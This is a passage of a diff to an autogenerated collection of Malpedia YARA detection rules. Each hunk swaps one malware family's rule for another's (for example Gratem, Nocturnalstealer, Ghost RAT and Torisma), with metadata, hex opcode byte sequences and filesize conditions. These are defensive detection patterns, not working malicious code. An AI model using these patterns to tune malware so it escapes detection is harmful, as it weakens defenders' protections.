"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.soundbite_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_001_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "dd4f6a00eb49b6e49c1bd5e71a528f06fe40aa9dfa91442cca75ad1ce88ee58a" + logic_hash = "4757a1bf889ab5e180c54dba6f09c40c0355df630267d0efd95e630d6757bdc3" score = 75 quality = 75 tags = "FILE" @@ -183796,32 +186597,32 @@ rule MALPEDIA_Win_Soundbite_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b5518 48 89451c 8b4a08 3bc8 7702 2bc1 } - $sequence_1 = { c1e81f 8d4c02ff 398dd4fcffff 7d1f } - $sequence_2 = { ff15???????? 8a4e02 8066030f 0fb7c0 240f 02c0 02c0 } - $sequence_3 = { e8???????? 83c428 8d7de0 e8???????? 8b450c 8b4d18 8b5514 } - $sequence_4 = { c745f0c4e9f2e5 c745f4e3f4eff2 66c745f8f900 894dc0 c745c4d3ffc8ff c745c8c5ffccff c745ccccffb3ff } - $sequence_5 = { 49 894d18 3bc1 7437 8b7d14 8b5708 } - $sequence_6 = { 8b4d08 8b550c 8d0411 83f802 } - $sequence_7 = { 7702 2bc2 8b5104 8b3c82 8b4d2c 8b5528 51 } - $sequence_8 = { 68???????? ff15???????? 8b7508 c7465ca0634200 83660800 33ff 47 } - $sequence_9 = { 8d75a0 e8???????? 8b5da0 8b4da4 8bc3 2bc1 } + $sequence_0 = { 6830750000 ffd6 8b4df8 85c9 7483 8d45fc } + $sequence_1 = { fec1 88143e 3a4801 72e6 5f 5e 5d } + $sequence_2 = { 2bc6 0f8421fdffff 2df2020000 0f8478fbffff 2d13030000 } + $sequence_3 = { b952555300 3bc1 7767 74d3 } + $sequence_4 = { 8bf1 8b06 57 56 ff5048 8bf8 85ff } + $sequence_5 = { ff15???????? 50 ff15???????? 8bf0 8975f8 3bf3 } + $sequence_6 = { 893d???????? e9???????? c705????????10000000 e9???????? 2d46494e00 7461 48 } + $sequence_7 = { 6a04 68???????? 6a07 6800080000 } + $sequence_8 = { 8935???????? 8d45cc 50 57 } + $sequence_9 = { 50 ff5108 8b45e4 3bc3 5b 7406 } condition: - 7 of them and filesize <409600 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Karma_Auto : FILE +rule MALPEDIA_Win_Gratem_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7f63a996-b29b-562f-996a-826393522cf0" + id = "89f0dee2-28c6-5a10-a3ad-288a448f45ac" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karma" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.karma_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gratem_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "2f60ce68960b60e178a1e413eabfae876f08564938fc3ab9af48ba4bf8caac6e" + logic_hash = "b58ab0ade84c3286830362f0f11bfb9519b8733c76dfe4e9cd7ba24746663e50" score = 75 quality = 75 tags = "FILE" @@ -183835,32 +186636,32 @@ rule MALPEDIA_Win_Karma_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b7f08 8bc7 d3e8 8b4d08 } - $sequence_1 = { 8bf9 8955f0 33c0 663907 7408 40 66833c4700 } - $sequence_2 = { 0f1006 0f114318 e8???????? 5f } - $sequence_3 = { ebc5 33ff 6690 0fb78ffc434000 } - $sequence_4 = { ff15???????? 6a00 8d442444 50 6800710200 } - $sequence_5 = { 660fefc8 0f1148f0 83e901 75e7 8d55e0 } - $sequence_6 = { 894dfc 894dc0 894dc4 894dc8 894dcc } - $sequence_7 = { 8b4c2418 8b44241c 83c140 6a00 6a00 83d000 } - $sequence_8 = { 8d4e20 0f47ce 2bca 750e 6685db 0f84c5000000 } - $sequence_9 = { 66833c45f051400000 75f4 33d2 663915???????? 7415 660f1f840000000000 } + $sequence_0 = { c744242404000000 ffd5 85c0 0f84b2000000 } + $sequence_1 = { 884e13 66a1???????? 33c9 6685c0 741f 0fb7c0 ba000c0000 } + $sequence_2 = { ff15???????? 8b442414 50 ff15???????? 8b5c2410 56 } + $sequence_3 = { 85c0 7405 e8???????? 8b8c24d4070000 5e 33cc } + $sequence_4 = { 663bc2 0f84ac030000 0fb7048d64bc4000 41 } + $sequence_5 = { 8b4c2440 8b542418 894114 895110 } + $sequence_6 = { 6a00 50 e8???????? 83c40c 6805010000 8d4c2404 51 } + $sequence_7 = { 53 ff54244c 85c0 8b442414 } + $sequence_8 = { 0fb7c0 baa8540000 663bc2 0f8420050000 0fb7048d64bc4000 41 } + $sequence_9 = { 56 8d34c5c0b84000 833e00 7513 50 e8???????? } condition: - 7 of them and filesize <49208 + 7 of them and filesize <155648 } -rule MALPEDIA_Win_Rawpos_Auto : FILE +rule MALPEDIA_Win_Nocturnalstealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "286abeec-e79d-5e9e-ac0c-a8048144fd9d" + id = "16d4de33-3c54-5479-87ac-366869086324" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rawpos_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nocturnalstealer_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "aa38577b3237b68cd5a9fc2dd4b4a121098ac6a8fc6a84d75e625596e4cdd326" + logic_hash = "6f15e0c8b7c880f99f33b6a9409ba20c65fe7c5674e094de4ef3ad4c2fb61399" score = 75 quality = 75 tags = "FILE" @@ -183874,32 +186675,32 @@ rule MALPEDIA_Win_Rawpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 47 bb01000000 3b5df8 7d17 8b45bc } - $sequence_1 = { eb22 8b550c ff02 8b0a 83f963 } - $sequence_2 = { 3b7594 7231 8b5520 52 6a00 8b4d18 8bd6 } - $sequence_3 = { c700???????? e9???????? bb40000000 ff45e0 e9???????? 33c0 8d55b8 } - $sequence_4 = { 7544 56 6a00 8b5518 83c703 52 53 } - $sequence_5 = { 83e805 7422 eb3b 8d55b4 8955b0 eb41 8b4db0 } - $sequence_6 = { c1e003 33db 8a1a 03c3 83c0d0 8b5dfc ff45fc } - $sequence_7 = { 83e201 83c703 8955e4 eb3f 33c9 8a0f } - $sequence_8 = { 51 50 ff550c 83c408 ff4df8 f7c601000000 0f855afaffff } - $sequence_9 = { 837da4ff 750c 8bc3 43 3b45ec 0f82abfeffff 837de400 } + $sequence_0 = { ff3424 5e 56 e9???????? 81e945418082 01ca e9???????? } + $sequence_1 = { e9???????? 09d6 5f 81e220000000 ba00000000 81f700000080 81eeffffff7f } + $sequence_2 = { e9???????? 01742404 ff3424 5e 57 89e7 e9???????? } + $sequence_3 = { 89ef ba00020000 2524000000 09cb 05ffffff7f 81e6ffffff7f 81c7a2000000 } + $sequence_4 = { e9???????? 83c004 330424 310424 330424 5c 55 } + $sequence_5 = { b8b4888b7f 251810fb62 253a26e37e 05b68054fc 31c7 e9???????? 331c24 } + $sequence_6 = { e9???????? 8d852731bc18 52 89e2 50 b804000000 01c2 } + $sequence_7 = { e9???????? 895c2404 8b1c24 83c404 893424 890424 e9???????? } + $sequence_8 = { e9???????? 57 891c24 890424 e9???????? 81c704000000 81c704000000 } + $sequence_9 = { f7d8 f7d0 c1e808 c1e802 e9???????? 29cf 8b0c24 } condition: - 7 of them and filesize <466944 + 7 of them and filesize <10739712 } -rule MALPEDIA_Win_Rombertik_Auto : FILE +rule MALPEDIA_Win_Vigilant_Cleaner_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b8dc9071-13ab-5355-92f1-2480db82efe0" + id = "a55582e3-616b-5a05-b673-fe9235d58867" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rombertik_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vigilant_cleaner_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "c93757fb5684dd7302fa22ed1f1f21c4fae8e9b1525dbcd58ab0d5e9fecbc821" + logic_hash = "c5f2d2527d22c9ed364af085c79f4bf3cbb7661e8edd11d29a8f6f3321af29a9" score = 75 quality = 75 tags = "FILE" @@ -183913,32 +186714,32 @@ rule MALPEDIA_Win_Rombertik_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8945f4 3bc1 0f8271ffffff 5f 5e } - $sequence_1 = { 8bff 8b4104 85c0 7446 83c0f8 33ff } - $sequence_2 = { 8bcf e8???????? 50 8d8dfcfeffff } - $sequence_3 = { 47 41 3bfb 72be 8b5df0 } - $sequence_4 = { 50 ff15???????? 8bf8 85ff 0f8488000000 } - $sequence_5 = { 33db 57 895df8 ff15???????? 85c0 } - $sequence_6 = { 8b5d0c 85db 0f84cb000000 837d1400 0f84c1000000 817d18a00f0000 0f87b4000000 } - $sequence_7 = { 50 8bc2 50 8d8decfeffff 51 ffd6 } - $sequence_8 = { 895dfc 85db 0f84d8000000 85ff } - $sequence_9 = { 6a03 6a00 6a02 68000000c0 68???????? ff15???????? 8906 } + $sequence_0 = { 53 b868584d56 bb00000000 b90a000000 ba58560000 ed 5b } + $sequence_1 = { ed 5b 59 5a } + $sequence_2 = { b90a000000 ba58560000 ed 5b } + $sequence_3 = { b90a000000 ba58560000 ed 5b 59 5a } + $sequence_4 = { bb00000000 b90a000000 ba58560000 ed 5b } + $sequence_5 = { bb00000000 b90a000000 ba58560000 ed 5b 59 } + $sequence_6 = { b90a000000 ba58560000 ed 5b 59 } + $sequence_7 = { bb00000000 b90a000000 ba58560000 ed 5b 59 5a } + $sequence_8 = { b868584d56 bb00000000 b90a000000 ba58560000 ed 5b } + $sequence_9 = { ba58560000 ed 5b 59 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <1181696 } -rule MALPEDIA_Win_Pandora_Auto : FILE +rule MALPEDIA_Win_Windealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "808a3fc1-f716-514d-83e0-324ab4b5c047" + id = "f3b71a3e-a02a-5dce-bc43-cb374750ce4e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pandora_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.windealer_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "9af9b8ff0c31cb495b736863fe90279cd9d4c249691d7818a687e6d77e1bb76b" + logic_hash = "d82b81175389182c804642799536612f0047302d818841ec0b2b4fd9f2036f88" score = 75 quality = 75 tags = "FILE" @@ -183952,32 +186753,32 @@ rule MALPEDIA_Win_Pandora_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48ffcb 48899d60020000 48ffc6 c60300 4c8bc6 488d8d60020000 } - $sequence_1 = { 458bce 41c1c90b 4433c9 44895d40 418bce 458bc3 c1c906 } - $sequence_2 = { 4885c0 750a b880eeffff e9???????? 4d8bcf 48896c2420 4c8d442430 } - $sequence_3 = { 488d1d43ef0200 4885c0 7404 488d5820 8bcf e8???????? 8903 } - $sequence_4 = { 4c8d7c2430 4c2bff 4c8dab80010000 0f1f4000 0f1f840000000000 488bd5 498d4d0f } - $sequence_5 = { 418bf8 488bea 488bf1 4d85c9 7423 498b4128 } - $sequence_6 = { 4533b48db0050700 418bcb 44337014 c1e908 0fb6d1 8bcb } - $sequence_7 = { 452bf8 c1ed08 452be0 8d4147 41c1ef08 41c1ec08 458d48e6 } - $sequence_8 = { 4403d1 418bc9 4181c139a093fc 41c1c20a 4403d2 f7d1 410bca } - $sequence_9 = { 79da 85db 0f8538020000 4c8d45cf 498bd7 488d4db7 e8???????? } + $sequence_0 = { 50 56 e8???????? 83c410 8b4618 } + $sequence_1 = { 6a00 ff15???????? 85c0 7407 50 ff15???????? 6a01 } + $sequence_2 = { 6a04 50 6a04 68???????? 68???????? } + $sequence_3 = { 50 56 e8???????? 83c410 8b4610 } + $sequence_4 = { 53 56 57 68da070000 } + $sequence_5 = { 56 57 68da070000 e8???????? } + $sequence_6 = { 56 e8???????? 83c410 8b4610 } + $sequence_7 = { 6a01 50 56 e8???????? 83c410 8bc7 } + $sequence_8 = { 668b91d2070000 8a89d0070000 52 51 } + $sequence_9 = { 8b4d08 668b91d2070000 8a89d0070000 52 51 } condition: - 7 of them and filesize <1032192 + 7 of them and filesize <770048 } -rule MALPEDIA_Win_Webc2_Head_Auto : FILE +rule MALPEDIA_Win_Torisma_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fbb157f3-5522-59eb-8966-994ac95b42ec" + id = "a1ed0c86-448e-5725-a3d9-4e9a8d06915c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_head_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.torisma_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "3accb9e007709b9cb8a99022cd642781f2c16d496b60a9e07fc0420c29da6736" + logic_hash = "5ec5e797b8010193d7caa6926dd920962119b17c8339298b3be41306fc75b6f7" score = 75 quality = 75 tags = "FILE" @@ -183991,34 +186792,37 @@ rule MALPEDIA_Win_Webc2_Head_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8a8c0cc0000000 eb02 b13d c1e810 83e03f 0fbec9 } - $sequence_1 = { 68???????? 55 55 896c2434 ffd7 } - $sequence_2 = { 8d942444080000 03f0 51 50 52 55 ff15???????? } - $sequence_3 = { e8???????? 83c40c 85c0 0f8554020000 b900050000 } - $sequence_4 = { 33db 89442418 52 c6450000 } - $sequence_5 = { 7513 8dbc2444040000 83c9ff f2ae f7d1 49 894c241c } - $sequence_6 = { 89442410 c1e002 89442418 8b4c2424 } - $sequence_7 = { eb02 b03d 884303 8b442410 } - $sequence_8 = { 83c410 c3 5f c6450000 5e } - $sequence_9 = { 2500ff0000 45 3d003d0000 7435 } + $sequence_0 = { e8???????? 3d83490000 7507 b883490000 } + $sequence_1 = { 7402 eb05 e9???????? b833280000 } + $sequence_2 = { e8???????? 3d514b0000 7504 33c0 } + $sequence_3 = { 488b4c2470 e8???????? 89442458 817c245870100000 } + $sequence_4 = { 030cb540ef0110 eb02 8bca f641247f 759b } + $sequence_5 = { b833280000 5f 5e 8be5 5d } + $sequence_6 = { 8b55fc 833a00 740c 8b45fc 8b08 51 } + $sequence_7 = { 488d442440 488bf8 33c0 b928000000 } + $sequence_8 = { 8b4c2430 488b542450 89048a ebb5 } + $sequence_9 = { 817dd833280000 7507 c745f433280000 eb07 c745f433280000 } + $sequence_10 = { c68424e1000000e9 c68424e2000000c3 c68424e3000000a5 c68424e400000090 } + $sequence_11 = { ff2495c0d50010 8bc7 ba03000000 83e904 720c 83e003 } + $sequence_12 = { c1e006 0b442414 88442410 8b442440 } condition: - 7 of them and filesize <106496 + 7 of them and filesize <322560 } -rule MALPEDIA_Win_Microcin_Auto : FILE +rule MALPEDIA_Win_Coinminer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7e85e39e-7daa-514d-802c-54d6ff85c6e9" + id = "05a9b3c6-9a1c-50a2-a943-afdee621f718" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.microcin_auto.yar#L1-L465" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.coinminer_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "3f18992fe004fbfcac38bd4eed04ab5733b0957df603607ba4dee35273474322" + logic_hash = "254b4cb9ab983948d36cfb896be0834484f66bd70a718e15bb65a41d1319a142" score = 75 - quality = 44 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -184030,74 +186834,34 @@ rule MALPEDIA_Win_Microcin_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 56 ff15???????? 85c0 0f45f7 } - $sequence_1 = { 442bc3 4803d6 4533c9 ff15???????? 85c0 75d9 488b742438 } - $sequence_2 = { ff15???????? 488bcb ff15???????? 448bc0 } - $sequence_3 = { 57 4154 4156 4157 488dac2400fbffff 4881ec00060000 488b05???????? } - $sequence_4 = { e8???????? 83c40c 8d85f8feffff 6804010000 50 ff15???????? 8d85f8feffff } - $sequence_5 = { 488b09 418bf8 488bf2 33db } - $sequence_6 = { ff15???????? 8b3d???????? 8d85e0feffff 50 } - $sequence_7 = { 488bcb 664489642438 488bf0 ff15???????? } - $sequence_8 = { 68ffff0000 56 8b35???????? ffd6 } - $sequence_9 = { 85c0 7e18 80bc35a8feffff3a 741f 8d85a8feffff 46 50 } - $sequence_10 = { c6840d8002000033 488d8d80020000 ff15???????? 4863c8 c6840d8002000079 } - $sequence_11 = { ff15???????? 8b1d???????? 8d85a8feffff 50 ffd3 } - $sequence_12 = { ff15???????? 4863c8 c6840d7002000062 488d8d70020000 ff15???????? 4863c8 } - $sequence_13 = { ff15???????? 85c0 7426 8b400c } - $sequence_14 = { 33f6 50 ffd3 85c0 7e18 } - $sequence_15 = { 488d4c2460 ff15???????? 4863c8 807c0c5f5c 7413 488d4c2460 ff15???????? } - $sequence_16 = { 41bc14030000 4c8d0574130100 488bcd 418bd4 e8???????? 33c9 85c0 } - $sequence_17 = { 83c108 51 ff15???????? 8b4dfc } - $sequence_18 = { 7370 696465726167656e 742e 657865 } - $sequence_19 = { 6e 6d 656e 7400 } - $sequence_20 = { 8b4510 8b8c8d78feffff 890c90 ebc8 e9???????? } - $sequence_21 = { 7647 498bcd e8???????? 4c8d05b7120100 41b903000000 } - $sequence_22 = { fa fa fa fa fa fa } - $sequence_23 = { 8b4df0 e8???????? 8d45f8 50 6a00 } - $sequence_24 = { 6828010000 8d85ccfeffff 6a00 50 } - $sequence_25 = { 418d7c24e7 85c0 752a 4c8d0502130100 8bd7 498bcd } - $sequence_26 = { 4c8d056c120100 498bd4 488bcd e8???????? 85c0 7541 4c8bc3 } - $sequence_27 = { 636373 7673 6873742e65 7865 } - $sequence_28 = { ff15???????? 8b45f4 8b4824 894dfc 8b55f4 83c208 } - $sequence_29 = { 8945fc eb42 8b45f8 33d2 } - $sequence_30 = { 8bd9 488d0d950c0100 ff15???????? 4885c0 7419 488d15730c0100 488bc8 } - $sequence_31 = { 488d15f8110100 41b810200100 488bcd e8???????? e9???????? 4533c9 4533c0 } - $sequence_32 = { 8b8504ffffff 898574feffff 8b4d0c 8b91fc020000 8b4508 0390f0040000 8b4d10 } - $sequence_33 = { 488bcd e8???????? 85c0 751a 488d15f8110100 41b810200100 } - $sequence_34 = { 8b55fc 83c208 52 ff15???????? 8b45fc c7400421000000 } - $sequence_35 = { 33c9 4889742420 e8???????? cc 4c8d056c120100 } - $sequence_36 = { 83ec08 894df8 c745fc00a40000 6a40 6800100000 6800a40000 6a00 } - $sequence_37 = { 49 53 53 56 43 } - $sequence_38 = { 8b4c2414 33cc e8???????? 8be5 5d c21000 57 } - $sequence_39 = { 0115???????? 1515151503 1515151515 1515041515 1515050607 0809 } - $sequence_40 = { 8d85e8feffff 50 ff95e4feffff 59 59 837d1c00 7513 } - $sequence_41 = { 8b8431f4dfffff 44 2bd8 45 2b9c31f8dfffff 45 895c2404 } - $sequence_42 = { 6a00 8d442448 50 ff15???????? 85c0 7420 } - $sequence_43 = { 8b4c2408 49 8b542410 e8???????? 85c0 74db 89c0 } - $sequence_44 = { f7f7 8365ec00 85c0 0f8e94010000 8365f000 8b7e44 } - $sequence_45 = { 89f1 48 8d5510 e8???????? 90 e8???????? bab3c4b3c4 } - $sequence_46 = { 6a00 8d85b0feffff 50 56 } - $sequence_47 = { 6a00 56 c785b4feffff00000000 ff15???????? 50 56 } - $sequence_48 = { 8d44245c 50 ff15???????? 33c0 5f } - $sequence_49 = { c744241030000000 c744241403000000 c7442418d0114000 c744241c00000000 c744242000000000 89742424 c744242800000000 } + $sequence_0 = { 85d2 750d 8b45f8 8b55fc 5f 5e } + $sequence_1 = { 8d7f04 73ef 83c104 8a10 7410 48 ffc0 } + $sequence_2 = { e9???????? 6a00 ff742414 ffd6 ff742414 8b3d???????? ffd7 } + $sequence_3 = { c3 8bc6 c745f200000000 99 0f57c0 66c745f60000 660fd645ea } + $sequence_4 = { 8bf0 e8???????? 8bf8 8d842450130000 } + $sequence_5 = { 53 56 8b35???????? 8bd9 57 8b3d???????? } + $sequence_6 = { 57 ff15???????? c70300000000 8b4510 5f c70600000000 5e } + $sequence_7 = { 9b 53 83473220 2c6a } + $sequence_8 = { 8d842434010000 50 ff15???????? 56 e8???????? 57 } + $sequence_9 = { 83c408 890d???????? 8bf2 8935???????? 85c9 7504 85f6 } condition: - 7 of them and filesize <417792 + 7 of them and filesize <1523712 } -rule MALPEDIA_Win_Unidentified_080_Auto : FILE +rule MALPEDIA_Win_Ghost_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b4f490ab-c91a-5e77-9e61-88b48864f732" + id = "a811e919-423f-5da5-9744-a836ad0cfe7b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_080_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ghost_rat_auto.yar#L1-L294" license_url = "N/A" - logic_hash = "a554ba61b72496370ffd16dee0c3f2b6444ec6fc0c35b79b5428032562bbd4cc" + logic_hash = "566fcbf38da6404d1cfb5b85cb33273a727f786f21d6a86dff53a4e450ad50b1" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -184109,32 +186873,54 @@ rule MALPEDIA_Win_Unidentified_080_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 53 8bd8 837b2c00 56 7571 8b4324 } - $sequence_1 = { 0bf2 89701c 83c020 83c120 ff8d74ffffff 0f8560feffff 8b8570ffffff } - $sequence_2 = { 8b4508 8b4808 8b500c 2bd1 894dfc 3bd3 7277 } - $sequence_3 = { 3bd6 7312 8b03 833c9000 8d0490 7402 } - $sequence_4 = { 8dbd40ffffff e8???????? 8bb53cffffff 83c620 c645fc0f 8b06 33ff } - $sequence_5 = { 83e73f 0b0cbdb8840210 83e03f 0b0c85b8860210 8b42f4 33c6 8bf8 } - $sequence_6 = { 8bec 83ec10 53 8bd8 ff4320 56 33f6 } - $sequence_7 = { 8bf0 83feff 7509 c68568ffffff0b eb66 8b4dbc } - $sequence_8 = { 57 50 8d45f4 64a300000000 33ff 33f6 } - $sequence_9 = { 8b4e30 8d5508 52 8b562c 50 51 52 } + $sequence_0 = { 6a01 56 ff15???????? 5e c20800 } + $sequence_1 = { 8bd9 e8???????? 8b4d08 3bc8 } + $sequence_2 = { 8b400c 85c0 7505 a1???????? 50 8bce } + $sequence_3 = { 8be5 5d c20400 894df4 } + $sequence_4 = { 894df4 c745f800000000 df6df4 83ec08 dc0d???????? } + $sequence_5 = { 6a6b 8bce e8???????? 5f } + $sequence_6 = { e8???????? 8b8e549f0000 83c41c 89848e14030000 8b86549f0000 } + $sequence_7 = { 8d7b01 c60396 f3a5 53 8bcd } + $sequence_8 = { 8db714030000 8b06 6aff 50 } + $sequence_9 = { 8b5614 8b02 8b400c 85c0 } + $sequence_10 = { e9???????? 8d45dc 50 681f000200 } + $sequence_11 = { 50 ff15???????? ffb6a8000000 ff15???????? ffb6ac000000 } + $sequence_12 = { 8dbd85feffff f3ab 66ab aa } + $sequence_13 = { 6a00 6a00 c705????????20010000 e8???????? 8b35???????? } + $sequence_14 = { e8???????? 8d85c0feffff 50 57 ff15???????? 8bf8 83ffff } + $sequence_15 = { 83c40c 8d85b8feffff 50 8d85b4fdffff } + $sequence_16 = { 8bce e8???????? 8b4df4 5f b001 5e } + $sequence_17 = { 8bf0 83c40c 46 750b 5f 5e 33c0 } + $sequence_18 = { ff15???????? 6a01 ff7620 ff15???????? 8b4e04 e8???????? } + $sequence_19 = { ff7510 ff75dc ff15???????? 85c0 7507 c745e401000000 834dfcff } + $sequence_20 = { 56 53 e8???????? 83c408 84c0 750b } + $sequence_21 = { 68???????? 50 6802000080 e8???????? 83c41c 5f 5e } + $sequence_22 = { 6a00 50 e8???????? 83c40c ff7508 6a40 ff15???????? } + $sequence_23 = { 8365fc00 ff7508 ff15???????? 40 50 ff15???????? 59 } + $sequence_24 = { 8b4608 8b7e20 8b36 813f6b006500 7406 } + $sequence_25 = { c7014c696272 83e9fc c70161727941 83e9fc } + $sequence_26 = { 813f6b006500 7406 813f4b004500 75e8 } + $sequence_27 = { c7014c6f6164 83e9fc c7014c696272 83e9fc } + $sequence_28 = { 7475 8b45bc 8b08 894db4 } + $sequence_29 = { 8911 eb26 8b45b4 8b4d08 8d540102 } + $sequence_30 = { 8b55dc 8b7a18 8b7220 0375f8 33c9 } + $sequence_31 = { 6bc928 8b9538ffffff 8b8560ffffff 03440a0c 8985fcfeffff } condition: - 7 of them and filesize <392192 + 7 of them and filesize <357376 } -rule MALPEDIA_Win_Xpertrat_Auto : FILE +rule MALPEDIA_Win_Neutrino_Pos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5a6115a3-5806-5873-b6ce-1ac58a01949b" + id = "3a77c0fc-cd49-5986-b2b4-8a8639992c93" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xpertrat_auto.yar#L1-L159" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.neutrino_pos_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "c8887b0fd33237ed86a90a507f71d2f7eed9cc8f7e7e530376d7c59ae0763d11" + logic_hash = "d3da7317997b76876b14e53b428d397cde821604c2c6da81c73b18c8b2dd677f" score = 75 quality = 75 tags = "FILE" @@ -184148,91 +186934,71 @@ rule MALPEDIA_Win_Xpertrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0870ff 0d80000700 0474 ff0478 } - $sequence_1 = { ff0a 250004003c 6c 70ff 0808 } - $sequence_2 = { ff05???????? 000d???????? 0878ff 0d98000700 6e 74ff } - $sequence_3 = { 0808 008f38001b26 001b 0d002a2364 ff08 } - $sequence_4 = { ff4d40 ff08 40 0430 ff0a 4c 000c00 } - $sequence_5 = { 0000 00a1cc004400 0bc0 7402 ffe0 68???????? } - $sequence_6 = { 0808 008a3800cc1c 5e 006c70ff 0808 } - $sequence_7 = { 007168 ff0468 ff0a 250004003c } - $sequence_8 = { ff15???????? 68fffe0000 ffd3 8bd0 } - $sequence_9 = { ff15???????? 68???????? ffd7 8b1d???????? } - $sequence_10 = { ff15???????? 6a00 6818000368 8b4508 } - $sequence_11 = { ff15???????? 68???????? ff15???????? 50 8d858cfeffff } - $sequence_12 = { ff15???????? 69c0e8030000 0f80b50a0000 50 } - $sequence_13 = { ff15???????? 6a00 6822000360 8b03 } - $sequence_14 = { ff15???????? 6a00 68???????? 6a00 68???????? 8b55e0 } - $sequence_15 = { ff15???????? 6a00 6806000368 8b4dd4 } + $sequence_0 = { 